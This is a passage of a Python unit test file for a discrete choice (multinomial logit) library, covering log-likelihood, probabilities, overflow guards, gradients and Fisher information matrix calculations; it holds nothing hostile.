        Ensure that we correctly calculate the log-likelihood, both with and
        without ridge penalties, and both with and without shape and intercept
        parameters.
        """
        # Create a utility transformation function for testing: the identity.
        def test_utility_transform(x, *args):
            return x
        # Calculate the index for each alternative for each individual
        test_index = self.fake_design.dot(self.fake_betas)
        # Exponentiate each index value
        exp_test_index = np.exp(test_index)
        # Calculate the denominator for each probability
        interim_dot_product = self.fake_rows_to_obs.T.dot(exp_test_index)
        test_denoms = self.fake_rows_to_obs.dot(interim_dot_product)
        # Calculate the probabilities for each individual
        prob_array = exp_test_index / test_denoms
        # Calculate what the log-likelihood should be: the sum of the log
        # probabilities of the chosen alternatives.
        choices = self.fake_df[self.choice_col].values
        expected_log_likelihood = np.dot(choices, np.log(prob_array))
        # Create a set of intercepts, that are all zeros
        intercepts = np.zeros(2)
        # Combine all the 'parameters'
        test_all_params = np.concatenate([intercepts, self.fake_betas], axis=0)
        # Calculate what the log-likelihood should be with a ridge penalty
        penalty = self.ridge * (test_all_params**2).sum()
        expected_log_likelihood_penalized = expected_log_likelihood - penalty
        # Alias the function being tested
        func = cc.calc_log_likelihood
        # Create the arguments for the function being tested
        args = [self.fake_betas,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                choices,
                test_utility_transform]
        kwargs = {"intercept_params": intercepts,
                  "shape_params": None}
        # Perform the tests. Note that kwargs is mutated and reused below, so
        # each later call builds on the settings left by the previous one.
        function_results = func(*args, **kwargs)
        self.assertAlmostEqual(expected_log_likelihood, function_results)
        # Test the weighted log-likelihood capability: doubling every weight
        # should exactly double the log-likelihood.
        weights = 2 * np.ones(self.fake_design.shape[0])
        kwargs["weights"] = weights
        function_results_2 = func(*args, **kwargs)
        self.assertAlmostEqual(2 * expected_log_likelihood, function_results_2)
        kwargs["weights"] = None
        # Test the ridge regression calculations
        kwargs["ridge"] = self.ridge
        function_results_3 = func(*args, **kwargs)
        self.assertAlmostEqual(expected_log_likelihood_penalized,
                               function_results_3)
        # Test the function again, this time without intercepts. The expected
        # value is unchanged because the all-zero intercepts contribute
        # nothing to the ridge penalty.
        kwargs["intercept_params"] = None
        function_results_4 = func(*args, **kwargs)
        self.assertAlmostEqual(expected_log_likelihood_penalized,
                               function_results_4)
        return None
def test_array_size_error_in_calc_probabilities(self):
"""
Ensure that a helpful ValueError is raised when a person tries to
calculate probabilities using BOTH a 2D coefficient array and a 3D
design matrix.
"""
# Alias the function being tested
func = cc.calc_probabilities
# Create fake arguments for the function being tested.
# Note these arguments are not valid in general, but suffice for
# testing the functionality we care about in this function.
args = [np.arange(9).reshape((3, 3)),
np.arange(27).reshape((3, 3, 3)),
None,
None,
None,
None]
# Note the error message that should be shown.
msg_1 = "Cannot calculate probabilities with both 3D design matrix AND"
msg_2 = " 2D coefficient array."
msg = msg_1 + msg_2
self.assertRaisesRegexp(ValueError,
msg,
func,
*args)
return None
def test_return_argument_error_in_calc_probabilities(self):
"""
Ensure that a helpful ValueError is raised when a person tries to
calculate probabilities using BOTH a return_long_probs == False and
chosen_row_to_obs being None.
"""
# Alias the function being tested
func = cc.calc_probabilities
# Create fake arguments for the function being tested.
# Note these arguments are not valid in general, but suffice for
# testing the functionality we care about in this function.
args = [np.arange(9).reshape((3, 3)),
np.arange(9).reshape((3, 3)),
None,
None,
None,
None]
# Note the error message that should be shown.
msg = "chosen_row_to_obs is None AND return_long_probs is False"
self.assertRaisesRegexp(ValueError,
msg,
func,
*args)
return None
def test_1D_calc_probabilities(self):
"""
Ensure that when using a 2D design matrix and 1D vector of parameters,
that the calc_probabilities function returns the correct values. Note
that this test will only verify the functionality under 'normal'
conditions, where the values of the exponentiated indices do not go
to zero nor to infinity.
"""
# Calculate the index vector
expected_index = self.fake_design.dot(self.fake_betas)
# Calculate exp(index)
expected_exp_index = np.exp(expected_index)
# Calculate the sum of exp(index) for each individual
denoms = self.fake_rows_to_obs.T.dot(expected_exp_index)
# Calculate the expected probabilities
expected_probs = expected_exp_index / self.fake_rows_to_obs.dot(denoms)
# Alias the function to be tested
func = cc.calc_probabilities
# Collect the arguments needed for this function
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
function_results = func(*args, **kwargs)
# Perform the tests
self.assertIsInstance(function_results, np.ndarray)
self.assertEqual(len(function_results.shape), 1)
self.assertEqual(function_results.shape, (self.fake_design.shape[0],))
npt.assert_allclose(function_results, expected_probs)
return None
    def test_return_values_of_calc_probabilities(self):
        """
        Ensure that the various configuration of return values can all be
        returned.
        """
        # Calculate the index vector
        expected_index = self.fake_design.dot(self.fake_betas)
        # Calculate exp(index)
        expected_exp_index = np.exp(expected_index)
        # Calculate the sum of exp(index) for each individual
        denoms = self.fake_rows_to_obs.T.dot(expected_exp_index)
        # Calculate the expected probabilities
        expected_probs = expected_exp_index / self.fake_rows_to_obs.dot(denoms)
        # Extract the probabilities of the chosen alternatives for each
        # observation
        chosen_indices = np.where(self.choice_array == 1)
        expected_chosen_probs = expected_probs[chosen_indices]
        # Alias the function to be tested
        func = cc.calc_probabilities
        # Create the chosen_row_to_obs mapping matrix
        choices_2d = self.choice_array[:, None]
        chosen_row_to_obs = self.fake_rows_to_obs.multiply(choices_2d)
        # Collect the arguments needed for this function
        args = [self.fake_betas,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                self.utility_transform]
        # kwargs_1 should result in long_probs being returned.
        kwargs_1 = {"intercept_params": self.fake_intercepts,
                    "shape_params": self.fake_shapes,
                    "return_long_probs": True}
        # kwargs_2 should result in (chosen_probs, long_probs) being returned.
        kwargs_2 = {"intercept_params": self.fake_intercepts,
                    "shape_params": self.fake_shapes,
                    "chosen_row_to_obs": chosen_row_to_obs,
                    "return_long_probs": True}
        # kwargs_3 should result in chosen_probs being returned.
        kwargs_3 = {"intercept_params": self.fake_intercepts,
                    "shape_params": self.fake_shapes,
                    "chosen_row_to_obs": chosen_row_to_obs,
                    "return_long_probs": False}
        # Collect the expected results, ordered to match the kwargs above.
        expected_results = [expected_probs,
                            (expected_chosen_probs, expected_probs),
                            expected_chosen_probs]
        # Perform the tests. The tuple return (kwargs_2) is unpacked and each
        # member array is checked individually against its expected value.
        for pos, kwargs in enumerate([kwargs_1, kwargs_2, kwargs_3]):
            function_results = func(*args, **kwargs)
            if isinstance(function_results, tuple):
                expected_arrays = expected_results[pos]
                for array_pos, array in enumerate(function_results):
                    current_expected_array = expected_arrays[array_pos]
                    self.assertIsInstance(array, np.ndarray)
                    self.assertEqual(array.shape, current_expected_array.shape)
                    npt.assert_allclose(array, current_expected_array)
            else:
                expected_array = expected_results[pos]
                self.assertIsInstance(function_results, np.ndarray)
                self.assertEqual(function_results.shape, expected_array.shape)
                npt.assert_allclose(function_results, expected_array)
        return None
    def test_2D_calc_probabilities(self):
        """
        Ensure that when using either a 2D design matrix and 2D vector of
        parameters, or a 3D design matrix and 1D vector of parameters,
        that the calc_probabilities function returns the correct values. Note
        that this test will only verify the functionality under 'normal'
        conditions, where the values of the exponentiated indices do not go
        to zero nor to infinity.
        """
        # Designate a utility transform for this test
        utility_transform = mnl._mnl_utility_transform
        # Calculate the index vector
        expected_index = self.fake_design.dot(self.fake_betas)
        # Calculate exp(index)
        expected_exp_index = np.exp(expected_index)
        # Calculate the sum of exp(index) for each individual
        denoms = self.fake_rows_to_obs.T.dot(expected_exp_index)
        # Calculate the expected probabilities
        expected_probs = expected_exp_index / self.fake_rows_to_obs.dot(denoms)
        # Create the 2D vector of expected probs: one identical column per
        # (duplicated) parameter set.
        expected_probs_2d = np.concatenate([expected_probs[:, None],
                                            expected_probs[:, None]], axis=1)
        # Create the 2D coefficient vector
        betas_2d = np.concatenate([self.fake_betas[:, None],
                                   self.fake_betas[:, None]], axis=1)
        # Sanity check that the 2D coefficients really yield multiple columns.
        assert self.fake_design.dot(betas_2d).shape[1] > 1
        # Create the 3D design matrix
        design_3d = np.concatenate([self.fake_design[:, None, :],
                                    self.fake_design[:, None, :]], axis=1)
        # Alias the function to be tested
        func = cc.calc_probabilities
        # Collect the arguments needed for this function
        args = [betas_2d,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                utility_transform]
        # The kwargs below mean that only the long format probabilities will
        # be returned.
        kwargs = {"intercept_params": self.fake_intercepts,
                  "shape_params": self.fake_shapes,
                  "chosen_row_to_obs": None,
                  "return_long_probs": True}
        function_results_1 = func(*args, **kwargs)
        # Now test the functions with the various multidimensional arguments.
        # Note args is mutated in place: 1D betas with a 3D design matrix.
        args[0] = self.fake_betas
        args[1] = design_3d
        function_results_2 = func(*args, **kwargs)
        # Now try the results when calling for chosen_probs as well
        chosen_row_to_obs = self.fake_rows_to_obs.multiply(
            self.choice_array[:, None])
        kwargs["chosen_row_to_obs"] = chosen_row_to_obs
        chosen_probs, function_results_3 = func(*args, **kwargs)
        # Perform the tests using a 2d coefficient array
        for function_results in [function_results_1,
                                 function_results_2,
                                 function_results_3]:
            self.assertIsInstance(function_results, np.ndarray)
            self.assertEqual(len(function_results.shape), 2)
            self.assertEqual(function_results.shape,
                             (self.fake_design.shape[0], 2))
            npt.assert_allclose(function_results, expected_probs_2d)
        # The chosen probabilities should be the rows of the long-format
        # probabilities where a choice was made.
        chosen_idx = np.where(self.choice_array == 1)[0]
        self.assertIsInstance(chosen_probs, np.ndarray)
        self.assertEqual(len(chosen_probs.shape), 2)
        npt.assert_allclose(chosen_probs, expected_probs_2d[chosen_idx, :])
        return None
    def test_calc_probabilities_robustness_to_under_overflow(self):
        """
        Ensure that the calc_probabilities function correctly handles under-
        and overflow in the exponential of the systematic utilities.
        """
        # Create a design array that will test the under- and over-flow
        # capabilities of the calc_probabilities function. Rows 2-4 yield
        # indices of +800 / -800 once multiplied by fake_betas, far outside
        # the representable range of exp().
        extreme_design = np.array([[1],
                                   [800 / self.fake_betas[0]],
                                   [-800 / self.fake_betas[0]],
                                   [-800 / self.fake_betas[0]],
                                   [3]])
        # Calculate the index vector
        expected_index = extreme_design.dot(self.fake_betas)
        # Calculate exp(index)
        expected_exp_index = np.exp(expected_index)
        # Guard against over and underflow, mirroring the clipping that
        # calc_probabilities is expected to apply internally.
        expected_exp_index[1] = np.exp(cc.max_exponent_val)
        expected_exp_index[[2, 3]] = np.exp(cc.min_exponent_val)
        # Calculate the sum of exp(index) for each individual
        denoms = self.fake_rows_to_obs.T.dot(expected_exp_index)
        # Calculate the expected probabilities
        expected_probs = expected_exp_index / self.fake_rows_to_obs.dot(denoms)
        # Guard against underflow: zero probabilities should be floored at
        # cc.min_comp_value.
        expected_probs[expected_probs == 0.0] = cc.min_comp_value
        # Alias the function to be tested
        func = cc.calc_probabilities
        # Collect the arguments needed for this function
        args = [self.fake_betas,
                extreme_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                self.utility_transform]
        kwargs = {"intercept_params": self.fake_intercepts,
                  "shape_params": self.fake_shapes,
                  "return_long_probs": True}
        function_results = func(*args, **kwargs)
        # Perform the tests. Note extreme_design has the same number of rows
        # as fake_design, so the shape comparison below is equivalent.
        self.assertIsInstance(function_results, np.ndarray)
        self.assertEqual(len(function_results.shape), 1)
        self.assertEqual(function_results.shape, (self.fake_design.shape[0],))
        npt.assert_allclose(function_results, expected_probs)
        return None
    def test_calc_gradient_no_shapes_no_intercepts(self):
        """
        Ensure that calc_gradient returns the correct values when there are no
        shape parameters and no intercept parameters.
        """
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index. Here it is the
        # identity (a sparse identity matrix).
        dh_dv = diags(np.ones(self.fake_design.shape[0]), 0, format='csr')
        def transform_deriv_v(*args):
            return dh_dv
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        # (both None since this scenario has neither kind of parameter).
        def transform_deriv_intercepts(*args):
            return None
        def transform_deriv_shapes(*args):
            return None
        # Collect the arguments needed to calculate the probabilities
        args = [self.fake_betas,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                self.utility_transform]
        kwargs = {"intercept_params": self.fake_intercepts,
                  "shape_params": self.fake_shapes,
                  "return_long_probs": True}
        # Calculate the required probabilities
        probs = cc.calc_probabilities(*args, **kwargs)
        # In this scenario, the gradient should be (Y- P)'(dh_dv * dv_db)
        # which simplifies to (Y- P)'(dh_dv * X)
        error_vec = (self.choice_array - probs)[None, :]
        expected_gradient = error_vec.dot(dh_dv.dot(self.fake_design)).ravel()
        # Alias the function being tested
        func = cc.calc_gradient
        # Collect the arguments for the function being tested. Based on the
        # sibling gradient tests, the four trailing slots are intercept
        # params, shape params, ridge, and weights; the last two are
        # overwritten below.
        gradient_args = [self.fake_betas,
                         self.fake_design,
                         self.fake_df[self.alt_id_col].values,
                         self.fake_rows_to_obs,
                         self.fake_rows_to_alts,
                         self.choice_array,
                         self.utility_transform,
                         transform_deriv_shapes,
                         transform_deriv_v,
                         transform_deriv_intercepts,
                         None,
                         None,
                         None,
                         None]
        function_gradient = func(*gradient_args)
        # Perform the required tests
        self.assertIsInstance(function_gradient, np.ndarray)
        self.assertEqual(function_gradient.shape, (self.fake_betas.shape[0],))
        npt.assert_allclose(function_gradient, expected_gradient)
        # Test the gradient function with the ridge argument (second-to-last
        # slot in gradient_args).
        gradient_args[-2] = self.ridge
        new_expected_gradient = (expected_gradient -
                                 2 * self.ridge * self.fake_betas[0])
        function_gradient_penalized = func(*gradient_args)
        self.assertIsInstance(function_gradient_penalized, np.ndarray)
        self.assertEqual(function_gradient_penalized.shape,
                         (self.fake_betas.shape[0],))
        npt.assert_allclose(function_gradient_penalized, new_expected_gradient)
        # Test the gradient function with weights (last slot). Note the ridge
        # penalty set above is still in effect for this call.
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        gradient_args[-1] = new_weights
        new_expected_gradient_weighted =\
            2 * expected_gradient - 2 * self.ridge * self.fake_betas[0]
        func_gradient_penalized_weighted = func(*gradient_args)
        self.assertIsInstance(func_gradient_penalized_weighted, np.ndarray)
        self.assertEqual(func_gradient_penalized_weighted.shape,
                         (self.fake_betas.shape[0],))
        npt.assert_allclose(func_gradient_penalized_weighted,
                            new_expected_gradient_weighted)
        return None
    def test_calc_gradient_no_shapes(self):
        """
        Ensure that calc_gradient returns the correct values when there are no
        shape parameters but there are intercept parameters.
        """
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index. Here it is the
        # identity (a sparse identity matrix).
        dh_dv = diags(np.ones(self.fake_design.shape[0]), 0, format='csr')
        def transform_deriv_v(*args):
            return dh_dv
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        # The intercept derivative uses all alternative columns except the
        # first.
        dh_d_intercept = self.fake_rows_to_alts[:, 1:]
        def transform_deriv_intercepts(*args):
            return dh_d_intercept
        def transform_deriv_shapes(*args):
            return None
        # Collect the arguments needed to calculate the probabilities
        args = [self.fake_betas,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                self.utility_transform]
        kwargs = {"intercept_params": self.fake_intercepts,
                  "shape_params": self.fake_shapes,
                  "return_long_probs": True}
        # Calculate the required probabilities
        probs = cc.calc_probabilities(*args, **kwargs)
        # In this scenario, the gradient should be (Y- P)'(dh_d_theta)
        # which simplifies to (Y- P)'[dh_d_intercept | dh_d_beta]
        # and finally to (Y- P)'[dh_d_intercept | dh_dv * X]
        error_vec = (self.choice_array - probs)[None, :]
        dh_d_beta = dh_dv.dot(self.fake_design)
        # .A densifies the sparse intercept block so it can be concatenated.
        dh_d_theta = np.concatenate((dh_d_intercept.A, dh_d_beta), axis=1)
        expected_gradient = error_vec.dot(dh_d_theta).ravel()
        # Alias the function being tested
        func = cc.calc_gradient
        # Collect the arguments for the function being tested
        gradient_args = [self.fake_betas,
                         self.fake_design,
                         self.fake_df[self.alt_id_col].values,
                         self.fake_rows_to_obs,
                         self.fake_rows_to_alts,
                         self.choice_array,
                         self.utility_transform,
                         transform_deriv_shapes,
                         transform_deriv_v,
                         transform_deriv_intercepts,
                         self.fake_intercepts,
                         None,
                         None,
                         None]
        function_gradient = func(*gradient_args)
        # Perform the required tests. The gradient should cover both the
        # intercepts and the betas.
        self.assertIsInstance(function_gradient, np.ndarray)
        self.assertEqual(function_gradient.shape,
                         (self.fake_betas.shape[0] +
                          self.fake_intercepts.shape[0],))
        npt.assert_allclose(function_gradient, expected_gradient)
        # Test the gradient function with weights (last slot in gradient_args)
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        gradient_args[-1] = new_weights
        expected_gradient_weighted = 2 * expected_gradient
        func_gradient_weighted = func(*gradient_args)
        self.assertIsInstance(func_gradient_weighted, np.ndarray)
        self.assertEqual(func_gradient_weighted.shape,
                         (self.fake_betas.shape[0] +
                          self.fake_intercepts.shape[0],))
        npt.assert_allclose(func_gradient_weighted, expected_gradient_weighted)
        return None
def test_calc_gradient_no_intercepts(self):
"""
Ensure that calc_gradient returns the correct values when there are no
intercept parameters but there are shape parameters.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
dh_dv = diags(np.ones(self.fake_design.shape[0]), 0, format='csr')
def transform_deriv_v(*args):
return dh_dv
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(*args):
return None
fake_deriv = np.exp(self.fake_shapes)[None, :]
dh_d_shape = self.fake_rows_to_alts[:, 1:].multiply(fake_deriv)
def transform_deriv_shapes(*args):
return dh_d_shape
# Collect the arguments needed to calculate the probabilities
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
# Calculate the required probabilities
probs = cc.calc_probabilities(*args, **kwargs)
# In this scenario, the gradient should be (Y- P)'(dh_d_theta)
# which simplifies to (Y- P)'[dh_d_shape | dh_d_beta]
# and finally to (Y- P)'[dh_d_shape | dh_dv * X]
error_vec = (self.choice_array - probs)[None, :]
dh_d_beta = dh_dv.dot(self.fake_design)
dh_d_theta = np.concatenate((dh_d_shape.A, dh_d_beta), axis=1)
expected_gradient = error_vec.dot(dh_d_theta).ravel()
# Alias the function being tested
func = cc.calc_gradient
# Collect the arguments for the function being tested
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
None,
self.fake_shapes,
None,
None]
function_gradient = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_gradient, np.ndarray)
self.assertEqual(function_gradient.shape,
(self.fake_betas.shape[0] +
self.fake_shapes.shape[0],))
npt.assert_allclose(function_gradient, expected_gradient)
# Perform the tests with a weighted gradient
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_gradient_weighted = 2 * expected_gradient
func_gradient_weighted = func(*gradient_args)
self.assertIsInstance(func_gradient_weighted, np.ndarray)
self.assertEqual(func_gradient_weighted.shape,
(self.fake_betas.shape[0] +
self.fake_shapes.shape[0],))
npt.assert_allclose(func_gradient_weighted, expected_gradient_weighted)
# Test the gradient function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_gradient_weighted = 2 * expected_gradient
func_gradient_weighted = func(*gradient_args)
self.assertIsInstance(func_gradient_weighted, np.ndarray)
self.assertEqual(func_gradient_weighted.shape,
(self.fake_betas.shape[0] +
self.fake_shapes.shape[0],))
npt.assert_allclose(func_gradient_weighted, expected_gradient_weighted)
return None
    def test_calc_gradient_shapes_and_intercepts(self):
        """
        Ensure that calc_gradient returns the correct values when there are
        shape and intercept parameters.
        """
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index. The identity
        # transformation is used here, so the derivative is a sparse identity.
        dh_dv = diags(np.ones(self.fake_design.shape[0]), 0, format='csr')
        def transform_deriv_v(*args):
            return dh_dv
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        # The leading column (the reference alternative) is excluded.
        dh_d_intercept = self.fake_rows_to_alts[:, 1:]
        def transform_deriv_intercepts(*args):
            return dh_d_intercept
        fake_deriv = np.exp(self.fake_shapes)[None, :]
        dh_d_shape = self.fake_rows_to_alts[:, 1:].multiply(fake_deriv)
        def transform_deriv_shapes(*args):
            return dh_d_shape
        # Collect the arguments needed to calculate the probabilities
        args = [self.fake_betas,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                self.utility_transform]
        kwargs = {"intercept_params": self.fake_intercepts,
                  "shape_params": self.fake_shapes,
                  "return_long_probs": True}
        # Calculate the required probabilities
        probs = cc.calc_probabilities(*args, **kwargs)
        # In this scenario, the gradient should be (Y- P)'(dh_d_theta)
        # which simplifies to (Y- P)'[dh_d_shape | dh_d_intercept | dh_d_beta]
        # and finally to (Y- P)'[dh_d_shape | dh_d_intercept | dh_dv * X]
        error_vec = (self.choice_array - probs)[None, :]
        dh_d_beta = dh_dv.dot(self.fake_design)
        # `.A` densifies the sparse derivative matrices so they can be
        # concatenated with the dense dh_d_beta block.
        dh_d_theta = np.concatenate((dh_d_shape.A,
                                     dh_d_intercept.A,
                                     dh_d_beta), axis=1)
        expected_gradient = error_vec.dot(dh_d_theta).ravel()
        # Alias the function being tested
        func = cc.calc_gradient
        # Collect the arguments for the function being tested. The final two
        # positions hold the ridge penalty and the observation weights; both
        # are unused (None) for the unweighted check.
        gradient_args = [self.fake_betas,
                         self.fake_design,
                         self.fake_df[self.alt_id_col].values,
                         self.fake_rows_to_obs,
                         self.fake_rows_to_alts,
                         self.choice_array,
                         self.utility_transform,
                         transform_deriv_shapes,
                         transform_deriv_v,
                         transform_deriv_intercepts,
                         self.fake_intercepts,
                         self.fake_shapes,
                         None,
                         None]
        function_gradient = func(*gradient_args)
        # Perform the required tests. The returned gradient stacks the
        # shape, intercept, and beta components, in that order.
        self.assertIsInstance(function_gradient, np.ndarray)
        self.assertEqual(function_gradient.shape,
                         (self.fake_betas.shape[0] +
                          self.fake_intercepts.shape[0] +
                          self.fake_shapes.shape[0],))
        npt.assert_allclose(function_gradient, expected_gradient)
        # Test the gradient function with weights. Doubling every weight
        # should simply double the gradient.
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        gradient_args[-1] = new_weights
        expected_gradient_weighted = 2 * expected_gradient
        func_gradient_weighted = func(*gradient_args)
        self.assertIsInstance(func_gradient_weighted, np.ndarray)
        self.assertEqual(func_gradient_weighted.shape,
                         (self.fake_betas.shape[0] +
                          self.fake_intercepts.shape[0] +
                          self.fake_shapes.shape[0],))
        npt.assert_allclose(func_gradient_weighted, expected_gradient_weighted)
        return None
def test_create_matrix_block_indices(self):
"""
Ensure that create_matrix_block_indices returns the expected results.
"""
# Note that we have two observations, the first with three alternatives
# and the second with two alternatives.
expected_results = [np.array([0, 1, 2]), np.array([3, 4])]
# Get the results of the function being tested
results = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Test that the two sets of results are equal
self.assertIsInstance(results, list)
self.assertTrue(all([isinstance(x, np.ndarray) for x in results]))
npt.assert_allclose(expected_results[0], results[0])
npt.assert_allclose(expected_results[1], results[1])
return None
def test_robust_outer_product(self):
"""
Ensure that robust_outer_product returns the expected results.
Unfortunately, I cannot find a good case now where using the regular
outer product gives incorrect results. However without a compelling
reason to remove the function, I'll trust my earlier judgement in
creating it in the first place.
"""
# Define a vector whose outer product we want to take
x = np.array([1e-100, 0.01])
outer_product = np.outer(x, x)
robust_outer_product = cc.robust_outer_product(x, x)
# Perform the desired tests
self.assertIsInstance(robust_outer_product, np.ndarray)
self.assertEqual(robust_outer_product.shape, outer_product.shape)
npt.assert_allclose(outer_product, robust_outer_product)
return None
def test_create_matrix_blocks(self):
"""
Ensure that create_matrix_blocks returns expected results when not
having to correct for underflow.
"""
# Designate a utility transform for this test
utility_transform = mnl._mnl_utility_transform
# Collect the arguments needed for this function
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
# Get the long-format probabilities
long_probs = cc.calc_probabilities(*args, **kwargs)
# Get the matrix-block indices
matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Create the matrix block for individual 1.
matrix_block_1 = (np.diag(long_probs[:3]) -
np.outer(long_probs[:3], long_probs[:3]))
matrix_block_2 = (np.diag(long_probs[3:]) -
np.outer(long_probs[3:], long_probs[3:]))
# Create a list of the expected results
expected_results = [matrix_block_1, matrix_block_2]
# Get the function results
func_results = cc.create_matrix_blocks(long_probs, matrix_indices)
for pos, result in enumerate(func_results):
self.assertIsInstance(result, np.ndarray)
self.assertEqual(result.shape, expected_results[pos].shape)
npt.assert_allclose(result, expected_results[pos])
return None
def test_create_matrix_blocks_with_underflow(self):
"""
Ensure that create_matrix_blocks returns expected results when also
having to correct for underflow.
"""
# Get the long-format probabilities
long_probs = np.array([cc.min_comp_value,
cc.min_comp_value,
1.0,
cc.min_comp_value,
1.0])
# Get the matrix-block indices
matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Create the matrix block for individual 1.
row_1 = [cc.min_comp_value, -cc.min_comp_value, -cc.min_comp_value]
row_2 = [-cc.min_comp_value, cc.min_comp_value, -cc.min_comp_value]
row_3 = [-cc.min_comp_value, -cc.min_comp_value, cc.min_comp_value]
matrix_block_1 = np.array([row_1, row_2, row_3])
matrix_block_2 = (np.diag(long_probs[3:]) -
np.outer(long_probs[3:], long_probs[3:]))
# Assuming that no probabilities should actually be zero or one,
# the underflow guard would set the last value to a very small,
# positive number
matrix_block_2[-1, -1] = cc.min_comp_value
# Create a list of the expected results
expected_results = [matrix_block_1, matrix_block_2]
# Get the function results
func_results = cc.create_matrix_blocks(long_probs, matrix_indices)
for pos, result in enumerate(func_results):
self.assertIsInstance(result, np.ndarray)
self.assertEqual(result.shape, expected_results[pos].shape)
npt.assert_allclose(result, expected_results[pos])
return None
    def test_calc_fisher_info_matrix_no_shapes_no_intercepts(self):
        """
        Ensure that calc_fisher_info_matrix returns the expected values when
        there are no shape or intercept parameters.
        """
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index.
        def transform_deriv_v(sys_utilities,
                              alt_IDs,
                              rows_to_alts,
                              shape_params):
            # Identity transformation, so the derivative is a sparse identity
            return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        # (both None since this test has no shape or intercept parameters).
        def transform_deriv_intercepts(*args):
            return None
        def transform_deriv_shapes(*args):
            return None
        # Collect the arguments for the function being tested. Positions 1-5
        # hold row-specific data and are overwritten below; the final two
        # positions are the ridge penalty and the observation weights.
        gradient_args = [self.fake_betas,
                         self.fake_design,
                         self.fake_df[self.alt_id_col].values,
                         self.fake_rows_to_obs,
                         self.fake_rows_to_alts,
                         self.choice_array,
                         self.utility_transform,
                         transform_deriv_shapes,
                         transform_deriv_v,
                         transform_deriv_intercepts,
                         None,
                         None,
                         None,
                         None]
        # Compute the gradient using only observation 1 (rows 0-2)
        gradient_args[1] = self.fake_design[:3, :]
        gradient_args[2] = self.fake_df[self.alt_id_col].values[:3]
        gradient_args[3] = self.fake_rows_to_obs[:3, :]
        gradient_args[4] = self.fake_rows_to_alts[:3, :]
        gradient_args[5] = self.choice_array[:3]
        gradient_1 = cc.calc_gradient(*gradient_args)
        # Compute the gradient using only observation 2 (rows 3-4)
        gradient_args[1] = self.fake_design[3:, :]
        gradient_args[2] = self.fake_df[self.alt_id_col].values[3:]
        gradient_args[3] = self.fake_rows_to_obs[3:, :]
        gradient_args[4] = self.fake_rows_to_alts[3:, :]
        gradient_args[5] = self.choice_array[3:]
        gradient_2 = cc.calc_gradient(*gradient_args)
        # Calculate the BHHH approximation to the Fisher Info Matrix: the
        # sum, over observations, of each gradient's outer product.
        expected_result = (np.outer(gradient_1, gradient_1) +
                           np.outer(gradient_2, gradient_2))
        # Alias the function being tested
        func = cc.calc_fisher_info_matrix
        # Get the results of the function being tested, on the full dataset
        gradient_args[1] = self.fake_design
        gradient_args[2] = self.fake_df[self.alt_id_col].values
        gradient_args[3] = self.fake_rows_to_obs
        gradient_args[4] = self.fake_rows_to_alts
        gradient_args[5] = self.choice_array
        function_result = func(*gradient_args)
        # Perform the required tests
        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result.shape)
        npt.assert_allclose(function_result, expected_result)
        # Test the Fisher info matrix function with weights. Doubling every
        # weight should double the BHHH approximation.
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        gradient_args[-1] = new_weights
        expected_result_weighted = 2 * expected_result
        func_result_weighted = func(*gradient_args)
        self.assertIsInstance(func_result_weighted, np.ndarray)
        self.assertEqual(func_result_weighted.shape,
                         expected_result_weighted.shape)
        npt.assert_allclose(func_result_weighted, expected_result_weighted)
        # Test the function with the ridge penalty, which subtracts
        # 2 * ridge from the BHHH approximation.
        expected_result_weighted -= 2 * self.ridge
        gradient_args[-2] = self.ridge
        function_result = func(*gradient_args)
